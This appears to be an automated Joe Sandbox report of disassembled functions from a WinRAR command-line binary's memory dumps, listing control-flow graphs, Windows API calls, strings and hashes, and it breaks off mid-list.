                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: wcschr
                                                                                                                                                                                                                                                              • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                                                              • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                                                              • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                                              • Instruction ID: 179d1992b9cde7e68205fcd3078c6f39688a8ab64daff25728fb93ce5fa57530
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68C18326A1CD8290EBA4AE3589511FC1351FF46FA9F844231FE4ECA6DBDE2CE504D349

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1564 7ff618607f24-7ff618607f5c 1565 7ff618607fd0 1564->1565 1566 7ff618607f5e-7ff618607f64 1564->1566 1568 7ff618607fd7-7ff618607fea 1565->1568 1566->1565 1567 7ff618607f66-7ff618607f7c call 7ff61860b3f0 1566->1567 1578 7ff618607fb5 1567->1578 1579 7ff618607f7e-7ff618607fb3 GetProcAddressForCaller GetProcAddress 1567->1579 1570 7ff618607fec-7ff618607fef 1568->1570 1571 7ff618608036-7ff618608039 1568->1571 1573 7ff61860805c-7ff618608065 GetCurrentProcessId 1570->1573 1575 7ff618607ff1-7ff618608000 1570->1575 1571->1573 1574 7ff61860803b-7ff61860804a 1571->1574 1576 7ff618608077-7ff618608093 1573->1576 1577 7ff618608067 1573->1577 1585 7ff61860804f-7ff618608051 1574->1585 1584 7ff618608005-7ff618608007 1575->1584 1580 7ff618608069-7ff618608075 1577->1580 1581 7ff618607fbc-7ff618607fce 1578->1581 1579->1581 1580->1576 1580->1580 1581->1568 1584->1576 1587 7ff618608009 1584->1587 1585->1576 1586 7ff618608053-7ff61860805a 1585->1586 1588 7ff618608010-7ff618608034 call 7ff6185dca6c call 7ff6185dcda4 call 7ff6185dca40 1586->1588 1587->1588 1588->1576
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                                              • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                                                              • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                                              • Instruction ID: 77d45e6e7cc1e0e8cccb4119a89db302725295952525e97c45a53216c411387b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B413521A08F8695EB45DB32B84057567A1AF49FF4F280131CC6EC77A4DE7DE846A38C

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 552178382-0
                                                                                                                                                                                                                                                              • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                                              • Instruction ID: a15830e80ba0e7eb3937bf6d6eaa7ad4a76f26a9ce9ccc0254610109b699b503
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40314111E0C98342FB55AB34A5523B963A2AF85FA4F444034DA0DC72D7DE2CE804A3D9

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F43D1
                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F4402
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F440D
                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F443E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                                                              • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                                                              • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                                                              • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                                              • Instruction ID: c2f808f1ec97448309d1c0c8b6d2cc0b00908c84d1b42f285d32eb5887279a69
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D119D26A18B4282EB619F32E8445A9B760FF88FE4F441131EE4E87A56DF3CD444DB49

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1715 7ff6185c7a5b-7ff6185c7a5e 1716 7ff6185c7a60-7ff6185c7a66 1715->1716 1717 7ff6185c7a68 1715->1717 1716->1717 1718 7ff6185c7a6b-7ff6185c7a7c 1716->1718 1717->1718 1719 7ff6185c7a7e-7ff6185c7a81 1718->1719 1720 7ff6185c7aa8 1718->1720 1721 7ff6185c7a83-7ff6185c7a86 1719->1721 1722 7ff6185c7a88-7ff6185c7a8b 1719->1722 1723 7ff6185c7aab-7ff6185c7ab8 1720->1723 1721->1720 1721->1722 1724 7ff6185c7aa4-7ff6185c7aa6 1722->1724 1725 7ff6185c7a8d-7ff6185c7a90 1722->1725 1726 7ff6185c7ac8-7ff6185c7acb 1723->1726 1727 7ff6185c7aba-7ff6185c7abd 1723->1727 1724->1723 1725->1720 1729 7ff6185c7a92-7ff6185c7a99 1725->1729 1728 7ff6185c7acf-7ff6185c7ad1 1726->1728 1727->1726 1730 7ff6185c7abf-7ff6185c7ac6 1727->1730 1731 7ff6185c7ad3-7ff6185c7ae6 1728->1731 1732 7ff6185c7b2a-7ff6185c7bb0 call 7ff6185e1d34 call 7ff6185c3f04 1728->1732 1729->1724 1733 7ff6185c7a9b-7ff6185c7aa2 1729->1733 1730->1728 1734 7ff6185c7ae8-7ff6185c7af2 call 7ff6185d9be0 1731->1734 1735 7ff6185c7b0a-7ff6185c7b27 1731->1735 1744 7ff6185c7bb2-7ff6185c7bba 1732->1744 1745 7ff6185c7bbc 1732->1745 1733->1720 1733->1724 1739 7ff6185c7af7-7ff6185c7b02 1734->1739 1735->1732 1739->1735 1744->1745 1746 7ff6185c7bbf-7ff6185c7bc9 1744->1746 1745->1746 1747 7ff6185c7bcb-7ff6185c7bd5 call 7ff6185e1e1c 1746->1747 1748 7ff6185c7bda-7ff6185c7c06 call 7ff6185cb540 1746->1748 1747->1748 1752 7ff6185c7c40 1748->1752 1753 7ff6185c7c08-7ff6185c7c0f 1748->1753 1755 7ff6185c7c44-7ff6185c7c5a call 7ff6185caa68 1752->1755 1753->1752 1754 7ff6185c7c11-7ff6185c7c14 1753->1754 1754->1752 1756 7ff6185c7c16-7ff6185c7c2b 1754->1756 1761 7ff6185c7c85-7ff6185c7c97 call 7ff6185cb540 1755->1761 1762 7ff6185c7c5c-7ff6185c7c6a 1755->1762 1756->1755 1758 7ff6185c7c2d-7ff6185c7c3e call 7ff618619b98 1756->1758 1758->1755 1767 7ff6185c7c9c-7ff6185c7c9f 1761->1767 1762->1761 1763 7ff6185c7c6c-7ff6185c7c7e call 7ff6185c8d98 1762->1763 1763->1761 1769 7ff6185c7ca5-7ff6185c7cfb call 7ff6185f9354 call 7ff6185e6378 * 2 1767->1769 1770 7ff6185c7fa4-7ff6185c7fbe 1767->1770 1777 7ff6185c7d17-7ff6185c7d1f 1769->1777 1778 7ff6185c7cfd-7ff6185c7d10 call 7ff6185c5414 1769->1778 1779 7ff6185c7d25-7ff6185c7d28 1777->1779 1780 7ff6185c7de2-7ff6185c7de6 1777->1780 1778->1777 1779->1780 1782 7ff6185c7d2e-7ff6185c7d36 1779->1782 1783 7ff6185c7e4e-7ff6185c7e68 call 7ff6185f9958 1780->1783 1784 7ff6185c7de8-7ff6185c7e49 call 7ff6185f98dc 1780->1784 1788 7ff6185c7d59-7ff6185c7d6a call 7ff61861a444 1782->1788 1789 7ff6185c7d38-7ff6185c7d49 call 7ff61861a444 1782->1789 1793 7ff6185c7e8b-7ff6185c7e8e 1783->1793 1794 7ff6185c7e6a-7ff6185c7e84 1783->1794 1784->1783 1801 7ff6185c7d78-7ff6185c7dc6 1788->1801 1802 7ff6185c7d6c-7ff6185c7d77 call 7ff6185ecf8c 1788->1802 1799 7ff6185c7d57 1789->1799 1800 7ff6185c7d4b-7ff6185c7d56 call 7ff6185e8ae8 1789->1800 1797 7ff6185c7e90-7ff6185c7e9a call 7ff6185f9990 1793->1797 1798 7ff6185c7e9f-7ff6185c7eb8 call 7ff6185c1204 1793->1798 1794->1793 1797->1798 1813 7ff6185c7ec8-7ff6185c7ed9 call 7ff6185f941c 1798->1813 1799->1801 1800->1799 1801->1780 1823 7ff6185c7dc8-7ff6185c7de1 call 7ff6185c1314 call 7ff61861ba34 1801->1823 1802->1801 1817 7ff6185c7edb-7ff6185c7f9f call 7ff6185c1400 call 7ff6185e6424 call 7ff6185cb540 1813->1817 1818 7ff6185c7eba-7ff6185c7ec3 call 7ff6185f9680 1813->1818 1817->1770 1818->1813 1823->1780
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: H9
                                                                                                                                                                                                                                                              • API String ID: 0-2207570329
                                                                                                                                                                                                                                                              • Opcode ID: 479a09c780d4be94e5648284cf9069ca7028a91d6761c81901c4d854d78fe811
                                                                                                                                                                                                                                                              • Instruction ID: d72bceea7558b1c83c21b1dafb9de42aa7f5de871d82ce89857f2d9d9ae2be62
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 479a09c780d4be94e5648284cf9069ca7028a91d6761c81901c4d854d78fe811
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90E1B062A08E9285EB50DB39E448BFD27E9EB45B6CF454435CE4D83B86DF38E544CB08

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1858 7ff6185e2574-7ff6185e259c 1859 7ff6185e25a5-7ff6185e25a9 1858->1859 1860 7ff6185e259e-7ff6185e25a0 1858->1860 1862 7ff6185e25ab-7ff6185e25b6 GetStdHandle 1859->1862 1863 7ff6185e25ba-7ff6185e25c6 1859->1863 1861 7ff6185e273a-7ff6185e2756 1860->1861 1862->1863 1864 7ff6185e2619-7ff6185e2637 WriteFile 1863->1864 1865 7ff6185e25c8-7ff6185e25cd 1863->1865 1868 7ff6185e263b-7ff6185e263e 1864->1868 1866 7ff6185e2644-7ff6185e2648 1865->1866 1867 7ff6185e25cf-7ff6185e2609 WriteFile 1865->1867 1870 7ff6185e2733-7ff6185e2737 1866->1870 1871 7ff6185e264e-7ff6185e2652 1866->1871 1867->1866 1869 7ff6185e260b-7ff6185e2615 1867->1869 1868->1866 1868->1870 1869->1867 1872 7ff6185e2617 1869->1872 1870->1861 1871->1870 1873 7ff6185e2658-7ff6185e2692 GetLastError call 7ff6185e3144 SetLastError 1871->1873 1872->1868 1878 7ff6185e2694-7ff6185e26a2 1873->1878 1879 7ff6185e26bc-7ff6185e26d0 call 7ff6185dc95c 1873->1879 1878->1879 1880 7ff6185e26a4-7ff6185e26ab 1878->1880 1885 7ff6185e26d2-7ff6185e26db 1879->1885 1886 7ff6185e2721-7ff6185e272e call 7ff6185dcf14 1879->1886 1880->1879 1882 7ff6185e26ad-7ff6185e26b7 call 7ff6185dcf34 1880->1882 1882->1879 1885->1863 1888 7ff6185e26e1-7ff6185e26e3 1885->1888 1886->1870 1888->1863 1889 7ff6185e26e9-7ff6185e271c 1888->1889 1889->1863
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3350704910-0
                                                                                                                                                                                                                                                              • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                                              • Instruction ID: 5a0f28e394872fe5a03b25815667116ff4e884ac9363935287afd07f533bd0fd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E851A322A08A4287EB64DF36E91437AB3A1FB45FA1F440135EE4E87A94CF3CE445C748

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1894 7ff6185e1e80-7ff6185e1ebb call 7ff61861a5a0 1897 7ff6185e1ebd-7ff6185e1ec1 1894->1897 1898 7ff6185e1ec8 1894->1898 1897->1898 1899 7ff6185e1ec3-7ff6185e1ec6 1897->1899 1900 7ff6185e1ecb-7ff6185e1f57 CreateFileW 1898->1900 1899->1900 1901 7ff6185e1fcd-7ff6185e1fd1 1900->1901 1902 7ff6185e1f59-7ff6185e1f76 GetLastError call 7ff6185f4534 1900->1902 1903 7ff6185e1fd3-7ff6185e1fd7 1901->1903 1904 7ff6185e1ff7-7ff6185e200f 1901->1904 1912 7ff6185e1fba 1902->1912 1913 7ff6185e1f78-7ff6185e1fb6 CreateFileW GetLastError 1902->1913 1903->1904 1906 7ff6185e1fd9-7ff6185e1ff1 SetFileTime 1903->1906 1907 7ff6185e2011-7ff6185e2022 call 7ff61860a9e8 1904->1907 1908 7ff6185e2027-7ff6185e204b call 7ff61861a610 1904->1908 1906->1904 1907->1908 1916 7ff6185e1fbf-7ff6185e1fc1 1912->1916 1913->1901 1915 7ff6185e1fb8 1913->1915 1915->1916 1916->1901 1917 7ff6185e1fc3 1916->1917 1917->1901
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1999340476-0
                                                                                                                                                                                                                                                              • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                                              • Instruction ID: a28d431b09aa23f6b1b61d21b0f90c2439d9b4082c8273102eddff570a60db23
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF413772A18A8146FBA48B35E9047A9BAA0E745FB9F000334EE7D876C4DF7CC4458B84

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
